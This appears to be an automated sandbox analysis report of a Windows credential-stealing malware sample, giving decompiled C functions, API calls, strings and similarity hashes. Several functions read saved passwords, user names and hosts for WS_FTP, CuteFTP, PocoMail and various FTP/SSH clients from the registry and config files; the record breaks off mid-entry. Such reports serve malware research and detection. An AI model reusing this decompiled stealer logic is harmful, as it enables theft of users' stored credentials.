0x00402615
0x00402626
0x0040262d
0x0040263f
0x00402646
0x00402648
0x00402648
0x0040264c
0x0040264c
0x00402651
0x00402653
0x0040266a
0x0040266c
0x00402686
0x00402699
0x004026c1
0x0040269b
0x004026b0
0x004026b0
0x004026c6
0x004026e1
0x004026e6
0x004026ea
0x004026fa
0x004026ff
0x004026ff
0x00402704
0x00402706
0x0040270e
0x0040270e
0x00402719
0x00402719
0x0040266c
0x00402722

APIs

RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 00402626
RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 0040263F
RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,00000000,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 0040264C
GetTempPathA.KERNEL32(00000104,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 00402665
CreateDirectoryA.KERNEL32(?,00000000,00000104,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 00402686
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?,?,004106C7), ref: 004026E1
CloseHandle.KERNEL32(?,?,00000000,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000), ref: 004026FF
DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?), ref: 0040270E

Strings

Software\WinRAR, xrefs: 0040261B

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
String ID: Software\WinRAR
API String ID: 3443402316-224198155
Opcode ID: 9076fdc188a22cbd499bc2bbe3cd84482c40aeaeb152589b2374c6cdc2a871d9
Instruction ID: 17b1f1f750073906f68301a3bf6da54a844cbe047f9a048bb246b4ff058c1830
Opcode Fuzzy Hash: 9076fdc188a22cbd499bc2bbe3cd84482c40aeaeb152589b2374c6cdc2a871d9
Instruction Fuzzy Hash: C7219F71A4020CBBDF21AFE1DD86FDD7A29AF14748F1004B6B604B50E1E6F99AD09B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404E40, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E40(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				CHAR* _v276;
				int _t24;
				void* _t25;
				void* _t26;
				long _t37;
				long _t40;
				void* _t47;
				void* _t48;

				_t48 = __edx;
				_t47 = __ecx;
				_v8 = E0040150D(_a4, 3, 0);
				_t24 = GetWindowsDirectoryA( &_v269, 0x104);
				if(_t24 != 0 && _t24 <= 0x104) {
					_v276 = E00401D15( &_v269, "\\win.ini");
					_t37 = GetPrivateProfileStringA("WS_FTP", "DIR", 0x4140dc,  &_v269, 0x104, _v276); // executed
					if(_t37 != 0) {
						E00404C68(_t47, _a4,  &_v269, 0);
					}
					_t40 = GetPrivateProfileStringA("WS_FTP", "DEFDIR", 0x4140dc,  &_v269, 0x104, _v276); // executed
					_t52 = _t40;
					if(_t40 != 0) {
						E00404C68(_t47, _a4,  &_v269, 0);
					}
					E004017D5(_v276);
				}
				_t25 = E00401DCE(_t52, 0x2b); // executed
				_t26 = _t25;
				_t53 = _t26;
				if(_t26 != 0) {
					E00404C68(_t47, _a4, E00401D69(_t26, "\\Ipswitch\\WS_FTP"), 0); // executed
					E004017D5(_t31);
				}
				E00404DF4(_t47, _t53, _a4, 0x1a, "\\Ipswitch"); // executed
				E00404DF4(_t47, _t53, _a4, 0x23, "\\Ipswitch"); // executed
				E00404DF4(_t47, _t53, _a4, 0x1c, "\\Ipswitch"); // executed
				return E00401553(_t48, _t53, _a4, _v8);
			}

0x00404e40
0x00404e40
0x00404e55
0x00404e69
0x00404e6b
0x00404e8d
0x00404eb4
0x00404ebb
0x00404ec9
0x00404ec9
0x00404eef
0x00404ef4
0x00404ef6
0x00404f04
0x00404f04
0x00404f0f
0x00404f0f
0x00404f16
0x00404f1b
0x00404f1b
0x00404f1d
0x00404f31
0x00404f36
0x00404f36
0x00404f45
0x00404f54
0x00404f63
0x00404f74

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00404E64

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,004140DC,?,00000104,?), ref: 00404EB4
GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,004140DC,?,00000104,?), ref: 00404EEF

Strings

\Ipswitch\WS_FTP, xrefs: 00404F1F
DIR, xrefs: 00404EAA
WS_FTP, xrefs: 00404EAF, 00404EEA
\Ipswitch, xrefs: 00404F3B, 00404F4A, 00404F59
\win.ini, xrefs: 00404E7C
DEFDIR, xrefs: 00404EE5

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
API String ID: 2508676433-45949541
Opcode ID: 01a537edadd59bddceef1694fae0bdf415c848880b34dd7182d3a1fe3049a342
Instruction ID: e00d4702d6b83cfd5b79c7bbcdca918ca21af511ae28e9f1c251b88d42575b58
Opcode Fuzzy Hash: 01a537edadd59bddceef1694fae0bdf415c848880b34dd7182d3a1fe3049a342
Instruction Fuzzy Hash: 452188B17902087ADF117AA1CC43FDA3A299F94744F1040777704B40E2EBFC9AC09A6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA6C, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040EA6C(void* __eflags, void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				CHAR* _v2076;
				long _t33;
				CHAR* _t48;
				long _t49;

				_v2076 = E004017EC(0x105);
				_t33 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				if(_t33 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t40);
						_v2072 = E00401C8E(_a4, _v2068, "Path", 0);
						__eflags = _v2072;
						if(__eflags != 0) {
							_t48 = E00401D15(_v2072, "\\PocoSystem.ini");
							_push(_t48);
							_t49 = GetPrivateProfileStringA("Program", "DataPath", 0x4140dc, _v2076, 0x104, _t48);
							__eflags = _t49 - 3;
							if(_t49 > 3) {
								E00404131(_a12, _v2076, "accounts.ini", 0xbeef0000);
							}
							E004017D5();
						}
						E0040EA6C(__eflags, _a4, _v2068, _a12);
						E004017D5(_v2068);
						E004017D5(_v2072);
						_v12 = _v12 + 1;
					}
					RegCloseKey(_v8);
				}
				return E004017D5(_v2076);
			}

0x0040ea7f
0x0040ea8f
0x0040ea96
0x0040ea9c
0x0040eaa3
0x0040eaa3
0x0040eaca
0x00000000
0x00000000
0x0040eaee
0x0040eaf4
0x0040eb0e
0x0040eb14
0x0040eb1b
0x0040eb28
0x0040eb2d
0x0040eb49
0x0040eb4e
0x0040eb51
0x0040eb66
0x0040eb66
0x0040eb6b
0x0040eb6b
0x0040eb7c
0x0040eb87
0x0040eb92
0x0040eb97
0x0040eb97
0x0040eba2
0x0040eba2
0x0040ebb3

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EA8F
RegEnumKeyExA.ADVAPI32 ref: 0040EAC3
GetPrivateProfileStringA.KERNEL32(Program,DataPath,004140DC,?,00000104,00000000), ref: 0040EB49
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EBA2

Strings

Path, xrefs: 0040EAFB
accounts.ini, xrefs: 0040EB58
Program, xrefs: 0040EB44
\PocoSystem.ini, xrefs: 0040EB1D
DataPath, xrefs: 0040EB3F

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocCloseEnumLocalOpenPrivateProfileString
String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
API String ID: 1343824468-2495907966
Opcode ID: b5c0b280644bee6996382e5a83c53ec8679b2acf3bcf6a67137770437b64a0c1
Instruction ID: 122af7354ceea1c80e976d98240d1f1ab236dc4a71dce6b0bb6b8652a25f0c4c
Opcode Fuzzy Hash: b5c0b280644bee6996382e5a83c53ec8679b2acf3bcf6a67137770437b64a0c1
Instruction Fuzzy Hash: 29312D7194011CBADF11ABA2CC42FDD7AB9BF04304F1084B7B245751E1DAB95AE19F9C

Uniqueness

Uniqueness Score: -1.00%

Function 004051B8, Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004051B8(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _t30;
				void* _t37;
				void* _t38;
				char* _t39;

				_t38 = __edx;
				_t37 = __ecx;
				_v8 = E0040150D(_a4, 4, 0);
				_t39 =  *0x414082; // 0x0
				if( *_t39 == 0) {
					L5:
					E0040510F(_t37, _t43, _a4, 0x1a); // executed
					E0040510F(_t37, _t43, _a4, 0x23); // executed
					E0040510F(_t37, _t43, _a4, 0x1c); // executed
					E0040510F(_t37, _t43, _a4, 0x26); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar"); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar"); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar"); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar"); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar"); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar"); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 9\\QCToolbar"); // executed
					return E00401553(_t38, _t43, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t30 = StrStrIA(_t39, "CUTEFTP"); // executed
					_t41 = _t30;
					if(_t30 != 0) {
						_t34 = E0040234A(_t41, _t39);
						if(E0040234A(_t41, _t39) != 0) {
							E00404FD8(_t37, _a4, _t34, "\\sm.dat");
							E004017D5(_t34);
						}
					}
					asm("cld");
					_t37 = 0xffffffff;
					asm("repne scasb");
					_t43 =  *_t39;
				} while ( *_t39 != 0);
				goto L5;
			}

0x004051b8
0x004051b8
0x004051cb
0x004051ce
0x004051d7
0x00405214
0x00405219
0x00405223
0x0040522d
0x00405237
0x00405244
0x00405251
0x0040525e
0x0040526b
0x00405278
0x00405285
0x00405292
0x004052a4
0x00000000
0x00000000
0x00000000
0x004051d9
0x004051d9
0x004051df
0x004051e4
0x004051e6
0x004051ee
0x004051f0
0x004051fc
0x00405201
0x00405201
0x004051f0
0x00405206
0x00405209
0x0040520e
0x00405210
0x00405210
0x00000000

APIs

StrStrIA.SHLWAPI(00000000,CUTEFTP), ref: 004051DF

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 0040523C
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405249
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 0040527D
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 00405263
Software\GlobalSCAPE\CuteFTP 9\QCToolbar, xrefs: 0040528A
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 00405270
\sm.dat, xrefs: 004051F3
CUTEFTP, xrefs: 004051D9
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 00405256

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 9\QCToolbar$\sm.dat
API String ID: 1884169789-3073816274
Opcode ID: c34e40b89e81a979602aea5d6b57cf767b342166a4fd3645b50516338e196d01
Instruction ID: c9e65f93459612828945218a38d798e19f240a3487c00c51deca1f9608bf85c0
Opcode Fuzzy Hash: c34e40b89e81a979602aea5d6b57cf767b342166a4fd3645b50516338e196d01
Instruction Fuzzy Hash: D8215E706841097ACF117F21CD03F8E3E269F907A4F10413AB9197C0F2CBBD9A919A4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406229, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406229(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr* _v2092;
				char _v2096;
				char _v2100;
				long _t57;
				long _t58;
				intOrPtr* _t72;

				_t57 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t58 = _t57;
				if(_t58 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "PW", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "Host", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "User", 0);
						_v2084 = E00401C8E( *0x4140fe, _v2068, "PthR", 0);
						_t72 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2096);
						if(_t72 == 0 || _v2096 != 4) {
							_t73 = _t72;
							if(_t72 != 0) {
								E004017D5(_t73);
							}
							_v2088 = 0x15;
						} else {
							 *_t23 =  *_t72;
							E004017D5(_t72);
						}
						_v2092 = E00401C8E( *0x4140fe, _v2068, "SSH",  &_v2100);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0010);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E00401486(_a4, _v2088);
							E004014E8(_a4, _v2084);
							if(_v2092 == 0 || _v2100 != 4) {
								E00401486(_a4, 0);
							} else {
								E00401486(_a4,  *_v2092);
							}
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2084);
						E004017D5(_v2092);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t58;
			}

0x0040623f
0x00406244
0x00406246
0x0040624c
0x00406253
0x00406253
0x0040627a
0x00000000
0x00000000
0x0040629d
0x004062bb
0x004062d9
0x004062f7
0x00406315
0x00406338
0x0040633a
0x00406355
0x00406357
0x0040635a
0x0040635a
0x0040635f
0x00406345
0x00406347
0x0040634e
0x0040634e
0x00406386
0x00406393
0x004063bb
0x004063c9
0x004063d7
0x004063e5
0x004063f3
0x00406401
0x0040640d
0x0040642f
0x00406418
0x00406423
0x00406423
0x0040640d
0x0040643a
0x00406445
0x00406450
0x0040645b
0x00406466
0x00406471
0x00406476
0x00406476
0x00000000
0x00406481
0x00406487

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040623F
RegEnumKeyExA.ADVAPI32 ref: 00406273
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406481

Strings

Host, xrefs: 004062C3
PthR, xrefs: 004062FF
Port, xrefs: 00406322
SSH, xrefs: 00406370
User, xrefs: 004062E1

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Port$PthR$SSH$User
API String ID: 1332880857-1643752846
Opcode ID: 39f30cf4631ecca601130555565e03e604095438465b813c5d9c2985eface6db
Instruction ID: dc339f5e81026a45414f470924930b9f0486a9fc6d38709ffe0ea3c9b7bda71c
Opcode Fuzzy Hash: 39f30cf4631ecca601130555565e03e604095438465b813c5d9c2985eface6db
Instruction Fuzzy Hash: FA51E63194011CEADF216BA2CC42BDD7AB9BF08704F14C0BAB545750B1DB7A5EA19FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405D78, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D78(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				char _v2092;
				long _t48;
				long _t49;
				intOrPtr* _t64;

				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t49 = _t48;
				if(_t49 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t54);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostAdrs", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "UserName", 0);
						_v2084 = E00401C8E( *0x4140fe, _v2068, "RemoteDir", 0);
						_t64 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2092);
						if(_t64 == 0 || _v2092 != 4) {
							_t65 = _t64;
							if(_t64 != 0) {
								E004017D5(_t65);
							}
							_v2088 = 0x15;
						} else {
							 *_t23 =  *_t64;
							E004017D5(_t64);
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E004014E8(_a4, _v2084);
							E00401486(_a4, _v2088);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2084);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t49;
			}

0x00405d8e
0x00405d93
0x00405d95
0x00405d9b
0x00405da2
0x00405da2
0x00405dc9
0x00000000
0x00000000
0x00405ded
0x00405df3
0x00405e10
0x00405e2e
0x00405e4c
0x00405e6a
0x00405e8d
0x00405e8f
0x00405eaa
0x00405eac
0x00405eaf
0x00405eaf
0x00405eb4
0x00405e9a
0x00405e9c
0x00405ea3
0x00405ea3
0x00405ec5
0x00405ee1
0x00405eef
0x00405efd
0x00405f0b
0x00405f19
0x00405f27
0x00405f27
0x00405f32
0x00405f3d
0x00405f48
0x00405f53
0x00405f5e
0x00405f63
0x00405f63
0x00000000
0x00405f6e
0x00405f74

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405D8E
RegEnumKeyExA.ADVAPI32 ref: 00405DC2
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F6E

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

HostAdrs, xrefs: 00405E18
UserName, xrefs: 00405E36
Password, xrefs: 00405DFA
RemoteDir, xrefs: 00405E54
Port, xrefs: 00405E77

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: HostAdrs$Password$Port$RemoteDir$UserName
API String ID: 3369285772-3748300950
Opcode ID: 4c6751013afbec193ce3993ac3dc4643b9ed273e405f98c4c98f0654d545aac2
Instruction ID: 895065a577242a1dc8cf9cb542de238b46a37634af73f481449c44b05c989335
Opcode Fuzzy Hash: 4c6751013afbec193ce3993ac3dc4643b9ed273e405f98c4c98f0654d545aac2
Instruction Fuzzy Hash: E041F53194011DAADF216BA2CC42BDE7AB9FF04304F10C0BAB544751B1DB7A5E92AF98

Uniqueness

Uniqueness Score: -1.00%

Function 004071D3, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004071D3(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t56;
				long _t57;

				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t57 = _t56;
				if(_t57 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t62);
						_v2080 = E00401C8E(_a8, _v2068, "FtpPassword", 0);
						_v2084 = E00401C8E(_a8, _v2068, "_FtpPassword", 0);
						_v2072 = E00401C8E(_a8, _v2068, "FtpServer", 0);
						_v2076 = E00401C8E(_a8, _v2068, "FtpUserName", 0);
						_v2088 = E00401C8E(_a8, _v2068, "FtpDirectory", 0);
						if(_v2080 != 0 || _v2084 != 0) {
							if(_v2072 != 0 && _v2076 != 0) {
								E00401486(_a4, 0xbeef0000);
								E004014E8(_a4, _v2072);
								E004014E8(_a4, _v2076);
								E004014E8(_a4, _v2080);
								E004014E8(_a4, _v2084);
								E004014E8(_a4, _v2088);
							}
						}
						E004017D5(_v2080);
						E004017D5(_v2084);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2088);
						E004071D3(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t57;
			}

0x004071e6
0x004071eb
0x004071ed
0x004071f3
0x004071fa
0x004071fa
0x00407221
0x00000000
0x00000000
0x00407245
0x0040724b
0x00407265
0x00407280
0x0040729b
0x004072b6
0x004072d1
0x004072de
0x004072f0
0x00407303
0x00407311
0x0040731f
0x0040732d
0x0040733b
0x00407349
0x00407349
0x004072f0
0x00407354
0x0040735f
0x0040736a
0x00407375
0x00407380
0x00407391
0x0040739c
0x004073a1
0x004073a1
0x00000000
0x004073ac
0x004073b2

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004071E6
RegEnumKeyExA.ADVAPI32 ref: 0040721A
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073AC

Strings

FtpServer, xrefs: 00407288
_FtpPassword, xrefs: 0040726D
FtpDirectory, xrefs: 004072BE
FtpUserName, xrefs: 004072A3
FtpPassword, xrefs: 00407252

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
API String ID: 1332880857-980612798
Opcode ID: f1b5941ca08cee94d1ae6fbbe1efe5f9bcaaa6bf321f235dce9eb98a1d4605a9
Instruction ID: eb35d637fb60ff57c6ef9e79c42a55e3363b4def4f450bd9d6fd20052dedf9b6
Opcode Fuzzy Hash: f1b5941ca08cee94d1ae6fbbe1efe5f9bcaaa6bf321f235dce9eb98a1d4605a9
Instruction Fuzzy Hash: 2E41C53194011CBADF226F51CC42BDC7BB6BF04304F10C0BAB958751B1DBBA5A92AF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA5F, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DA5F(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				char* _v2092;
				long _t57;
				long _t58;

				_t57 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t58 = _t57;
				if(_t58 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2092 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t63);
						_v2068 = E00401C8E(_a4, _v2092, "HostName", 0);
						_v2072 = E00401C8E(_a4, _v2092, "UserName", 0);
						_v2076 = E00401C8E(_a4, _v2092, "Password", 0);
						_v2080 = E00401C8E(_a4, _v2092, "PortNumber",  &_v2088);
						_v2084 = E00401C8E(_a4, _v2092, "TerminalType", 0);
						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a12, 0xbeef0000);
							E004014E8(_a12, _v2068);
							E004014E8(_a12, _v2072);
							E004014E8(_a12, _v2076);
							E004014BC(_a12, _v2080, _v2088);
							E004014E8(_a12, _v2084);
						}
						E0040DA5F(_a4, _v2092, _a12);
						E004017D5(_v2092);
						E004017D5(_v2068);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2080);
						E004017D5(_v2084);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t58;
			}

0x0040da72
0x0040da77
0x0040da79
0x0040da7f
0x0040da86
0x0040da86
0x0040daad
0x00000000
0x00000000
0x0040dad1
0x0040dad7
0x0040daf1
0x0040db0c
0x0040db27
0x0040db47
0x0040db62
0x0040db6f
0x0040db8b
0x0040db99
0x0040dba7
0x0040dbb5
0x0040dbc9
0x0040dbd7
0x0040dbd7
0x0040dbe8
0x0040dbf3
0x0040dbfe
0x0040dc09
0x0040dc14
0x0040dc1f
0x0040dc2a
0x0040dc2f
0x0040dc2f
0x00000000
0x0040dc3a
0x0040dc40

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DA72
RegEnumKeyExA.ADVAPI32 ref: 0040DAA6
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DC3A

Strings

PortNumber, xrefs: 0040DB34
HostName, xrefs: 0040DADE
TerminalType, xrefs: 0040DB4F
UserName, xrefs: 0040DAF9
Password, xrefs: 0040DB14

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$PortNumber$TerminalType$UserName
API String ID: 1332880857-1017491782
Opcode ID: 7caa8052822bda6067befa5e1fbf85658180712946805083f77da88c6935b249
Instruction ID: 74ed6bc0f2f1019c4438166421eefdcc1314a9bab96f8c2a3f024f8d1cd312b8
Opcode Fuzzy Hash: 7caa8052822bda6067befa5e1fbf85658180712946805083f77da88c6935b249
